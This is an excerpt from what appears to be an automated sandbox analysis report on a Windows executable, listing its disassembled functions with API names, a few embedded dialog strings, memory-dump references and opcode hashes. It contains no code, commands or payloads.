                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                    • String ID: U
                                                                                    • API String ID: 2456169464-4171548499
                                                                                    • Opcode ID: 5befa6d2be0fd5b67dcb017487ef09f133bab1f766b7e0f7a67ba1bd74810f78
                                                                                    • Instruction ID: e9512243e1f7e0454f1aa5f75ef9f59fe2e12153c546ac2e973ba4603a3023ca
                                                                                    • Opcode Fuzzy Hash: 5befa6d2be0fd5b67dcb017487ef09f133bab1f766b7e0f7a67ba1bd74810f78
                                                                                    • Instruction Fuzzy Hash: 3741C132A18A418AE720DF29F4443AAE7A0FB99785F844035EF4D87788DF3CD442C714
                                                                                    Function 00007FF7B8F1894C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 1429681911-3916222277
                                                                                    • Opcode ID: 96663003afbb983012e65a235a3e72d858c2bef55b85c1d2e0f82d221f925f92
                                                                                    • Instruction ID: 68e79188aa33b9ddb7707e959c0094c376f7e341dda3c67ae075e0374480b7ae
                                                                                    • Opcode Fuzzy Hash: 96663003afbb983012e65a235a3e72d858c2bef55b85c1d2e0f82d221f925f92
                                                                                    • Instruction Fuzzy Hash: C03152356087418BEB04DF16B81866AF762FB99FD2F804535EE4E43B18CE3CE54A8B14
                                                                                    Function 00007FF7B8F0E1DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                                                                    • Instruction ID: 9ca5fb3a3af263ddb78e597bcdb64c5dba23e38ebdd2a5ba12e2e8a0db618d4c
                                                                                    • Opcode Fuzzy Hash: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                                                                    • Instruction Fuzzy Hash: 3321B1B2E166018AF744AF28D4447A9B3A2EBA570BF948034CB190A289DF7E55468768
                                                                                    Function 00007FF7B8F17E64 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDeviceRelease
                                                                                    • String ID:
                                                                                    • API String ID: 127614599-3916222277
                                                                                    • Opcode ID: b788b9f34dcccb07ae15ed5b9740800ffd8b1723ff2eea9fbf29bf89ebbc6933
                                                                                    • Instruction ID: 631431a03662a40a63f1a2440db6a72352a503bf41dc99fc2ba4cf4c606a829a
                                                                                    • Opcode Fuzzy Hash: b788b9f34dcccb07ae15ed5b9740800ffd8b1723ff2eea9fbf29bf89ebbc6933
                                                                                    • Instruction Fuzzy Hash: 11E0C230F0864286EB0C6BBAB58917AE262BB4CBD1F554534DB1B83B9CDD3CC5924314
                                                                                    Function 00007FF7B8F0FB64 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1452528299-0
                                                                                    • Opcode ID: 6cbb26e744af2e91340f533f673a355f6d5f1da7bd3e89a5b40208807d6a5373
                                                                                    • Instruction ID: 377880130b0b42151617e507d54382b468154b1d0392d2719fa5a6410e259323
                                                                                    • Opcode Fuzzy Hash: 6cbb26e744af2e91340f533f673a355f6d5f1da7bd3e89a5b40208807d6a5373
                                                                                    • Instruction Fuzzy Hash: 1751B472F146468DEB00AF78D4412ECE361EBA6789F804631EB1C5769ADE3CD646C358
                                                                                    Function 00007FF7B8F02D24 Relevance: 6.1, APIs: 4, Instructions: 106fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3823481717-0
                                                                                    • Opcode ID: 5a8fed6e04792ee237e41453813ab40711500e7b97d58e78cf52d7f6f1c0b668
                                                                                    • Instruction ID: 0d5117ce1206a814e8061d3a738e054dcb38533662fbd088ba99465942f46593
                                                                                    • Opcode Fuzzy Hash: 5a8fed6e04792ee237e41453813ab40711500e7b97d58e78cf52d7f6f1c0b668
                                                                                    • Instruction Fuzzy Hash: 6E41F272F15B528CFB01AF68D8441ACA371BF5A795F901231DF6C26A9DDF38D442C218
                                                                                    Function 00007FF7B8F2CA7C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 4141327611-0
                                                                                    • Opcode ID: 879f52e497723d9a3569402380f5e7b560e55f1c531994a1a05d40c156ecefaf
                                                                                    • Instruction ID: 0dd34b2c83d55a1f3dcfca6d486754a2d235a8b7359a752c9f6899a2c704c30f
                                                                                    • Opcode Fuzzy Hash: 879f52e497723d9a3569402380f5e7b560e55f1c531994a1a05d40c156ecefaf
                                                                                    • Instruction Fuzzy Hash: F8419331A0C6424EFB61BF18D050379E690EF62B92F948131EB59066DDDF2CD9438B28
                                                                                    Function 00007FF7B8F2FA98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FAB1
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB13
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB4D
                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                    • String ID:
                                                                                    • API String ID: 1557788787-0
                                                                                    • Opcode ID: 4460fef583955eb88b4b670e1170f659abad76d955809809eb250dbf883a25ba
                                                                                    • Instruction ID: 56b504be0e6673fa32f431d06e9551068fa4b2c01f837c382ccb39475dda832a
                                                                                    • Opcode Fuzzy Hash: 4460fef583955eb88b4b670e1170f659abad76d955809809eb250dbf883a25ba
                                                                                    • Instruction Fuzzy Hash: E2218271A2875285E630AF19A410029E6A4FB69BD2F884134EB9E63BD8DF3CD4528718
                                                                                    Function 00007FF7B8EF2F50 Relevance: 6.1, APIs: 4, Instructions: 68filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$ConnectNamedObjectOverlappedPipeReadResultSingleWaitWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1643396940-0
                                                                                    • Opcode ID: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                                                                    • Instruction ID: ca78afb9be9da7f3dd0cc3da033dd4ee50e9b7666c73fe2c7c9d45d4c3f75372
                                                                                    • Opcode Fuzzy Hash: 87c0965e002af64279ee4d5d2dd98da1740ecd3901f5709c99e998647e30e0e3
                                                                                    • Instruction Fuzzy Hash: 96215C62618A8285FA20EB5AE5443BAE360FF56BC4F844036DF8C47799DF3DE4178314
                                                                                    Function 00007FF7B8F2C360 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$abort
                                                                                    • String ID:
                                                                                    • API String ID: 1447195878-0
                                                                                    • Opcode ID: f89eb9ad050740839cc9308028d244b334b55a7e4c5a6fa4defeaefeb524a64b
                                                                                    • Instruction ID: 81f3c528873e57642ea5a828c9cc9b514a3f7b93bbdece3a75469843262d7fb0
                                                                                    • Opcode Fuzzy Hash: f89eb9ad050740839cc9308028d244b334b55a7e4c5a6fa4defeaefeb524a64b
                                                                                    • Instruction Fuzzy Hash: CF018030B093024AFA587B7CA65517CD1919F66782F940939FB0E067DFEE2CF8134628
                                                                                    Function 00007FF7B8F22DDC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: f8d4b6dc9110704a375f041d958759aeaba9b5331f0121f5c3bc95ee7e974b23
                                                                                    • Instruction ID: 833c4af44c93302210db41d82317dc240e7317102e338aaa5240fd993bfa5de3
                                                                                    • Opcode Fuzzy Hash: f8d4b6dc9110704a375f041d958759aeaba9b5331f0121f5c3bc95ee7e974b23
                                                                                    • Instruction Fuzzy Hash: B1118C32B14F0689EB009F64E8542A8B3A0FB2A759F840A31EB2D427A8DF7CD0558394
                                                                                    Function 00007FF7B8EFD7A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: DXGIDebug.dll
                                                                                    • API String ID: 3668304517-540382549
                                                                                    • Opcode ID: 24c119c9e9697524d673fe2396fd682c6c2820dbbff77914f82a2f3af28df38b
                                                                                    • Instruction ID: 2e89b65752f893536a320bd33f661f9d319302e51401954bad6b7b76031826e4
                                                                                    • Opcode Fuzzy Hash: 24c119c9e9697524d673fe2396fd682c6c2820dbbff77914f82a2f3af28df38b
                                                                                    • Instruction Fuzzy Hash: 6A81D232A14B818AEB10DF69E4403ADF3A5FB65794F944225DFAC07799DF78E192C308
                                                                                    Function 00007FF7B8F2D114 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: e+000$gfff
                                                                                    • API String ID: 3215553584-3030954782
                                                                                    • Opcode ID: 55543e8f51fbcfbd427c67879d07161cfd4e53d29010c143201430e03efe1647
                                                                                    • Instruction ID: de651a5bf0f80dd31e4dba25cb5c25916973f3ec4f460093b613220c2c8443d6
                                                                                    • Opcode Fuzzy Hash: 55543e8f51fbcfbd427c67879d07161cfd4e53d29010c143201430e03efe1647
                                                                                    • Instruction Fuzzy Hash: DD513C72B187C54AE725AF3D9840369EB91EB62B91F488231D79C47BDDCE2CD046C724
                                                                                    Function 00007FF7B8F08638 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                    • String ID: SIZE
                                                                                    • API String ID: 449872665-3243624926
                                                                                    • Opcode ID: 1d7f884ddf5782503e89e33a0e9baa4ca88bfe6c07104dd70b22ee0e14eaa193
                                                                                    • Instruction ID: b6a69e35155a473a68fcf06fea3f9c7db2a1489bf6662752229657d89e8c2955
                                                                                    • Opcode Fuzzy Hash: 1d7f884ddf5782503e89e33a0e9baa4ca88bfe6c07104dd70b22ee0e14eaa193
                                                                                    • Instruction Fuzzy Hash: 8D41DA72A286859DE910EF2CD8413B9E350AFA6791F804231F75C066DFEE3CE442C718
                                                                                    Function 00007FF7B8F193B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 2478532303-3402441367
                                                                                    • Opcode ID: de86a58ae0d4400cbb940383b93c77b4a41bd883685c504193e2c73218fa6269
                                                                                    • Instruction ID: 9410b62726f5a33e078810d537ab32e299a5371d7503336c8fd257d891705cc5
                                                                                    • Opcode Fuzzy Hash: de86a58ae0d4400cbb940383b93c77b4a41bd883685c504193e2c73218fa6269
                                                                                    • Instruction Fuzzy Hash: 03416032B0864289FA10BB19D4502BDE7A0EB67BC2FD44035DB4D177A9CE3ED95783A4
                                                                                    Function 00007FF7B8F2B1E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                    • String ID: C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                    • API String ID: 3307058713-847691198
                                                                                    • Opcode ID: f1029ee2d2a2c32248948be3e311db7be68871d69f783648d7bc8f9016e3246c
                                                                                    • Instruction ID: 1ffc22a1e50e7fa4d053ac224aba4d0e9cfabc2756f48cfc7ee4f52b8495e1f0
                                                                                    • Opcode Fuzzy Hash: f1029ee2d2a2c32248948be3e311db7be68871d69f783648d7bc8f9016e3246c
                                                                                    • Instruction Fuzzy Hash: C7416F31A08A128EEB15AF29A4400ACE794EF66BD5FD44036FE0D47B49DF3CE5438324
                                                                                    Function 00007FF7B8F1EA90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 2478532303-3299779563
                                                                                    • Opcode ID: 5669e4ff082e1c4d999b35573aeec658a1c333ba0aeeee1b7d4a8f7d545db3a9
                                                                                    • Instruction ID: ff0d6ed3048fe0e074cd0dac8ab8427f3a94e98523213fbfe320bb71020b18c1
                                                                                    • Opcode Fuzzy Hash: 5669e4ff082e1c4d999b35573aeec658a1c333ba0aeeee1b7d4a8f7d545db3a9
                                                                                    • Instruction Fuzzy Hash: 37317432B0860285FA11BB29D55427DE651AF67BC2FD40134DF0E17799DE3DE9438319
